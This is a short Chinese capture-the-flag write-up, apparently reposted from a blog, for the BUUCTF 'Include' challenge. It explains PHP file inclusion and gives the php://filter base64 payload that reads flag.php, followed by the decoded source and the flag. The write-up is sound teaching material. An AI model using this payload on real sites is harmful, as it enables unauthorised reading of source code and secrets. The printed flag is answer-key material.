【BUUCTF】[ACTF2020 新生赛] IncludeWriteup

【BUUCTF】[ACTF2020 新生赛]Include

0x00 知识点

  • ?file=flag.php 猜测文件包含漏洞

  • php://filter与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,阻止其不执行。从而导致任意文件读取。

  • php://filter 伪协议文件包含读取源代码,加上read=convert.base64-encode,用base64编码输出,不然会直接当做php代码执行,看不到源代码内容。

  • php://input 伪协议 + POST发送PHP代码 (不行)

在这里插入图片描述

0x01 解题

在这里插入图片描述
在这里插入图片描述

?file=php://filter/read=convert.base64-encode/resource=flag.php
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YWUyM2EzZWItM2FkNS00NzMzLWI1NGUtOTkzMjJlOTc1NTk5fQo=

在这里插入图片描述

<?php
echo "Can you find out the flag?";
//flag{ae23a3eb-3ad5-4733-b54e-99322e975599}

flag{ae23a3eb-3ad5-4733-b54e-99322e975599}

猜你喜欢

转载自blog.csdn.net/vanarrow/article/details/108177243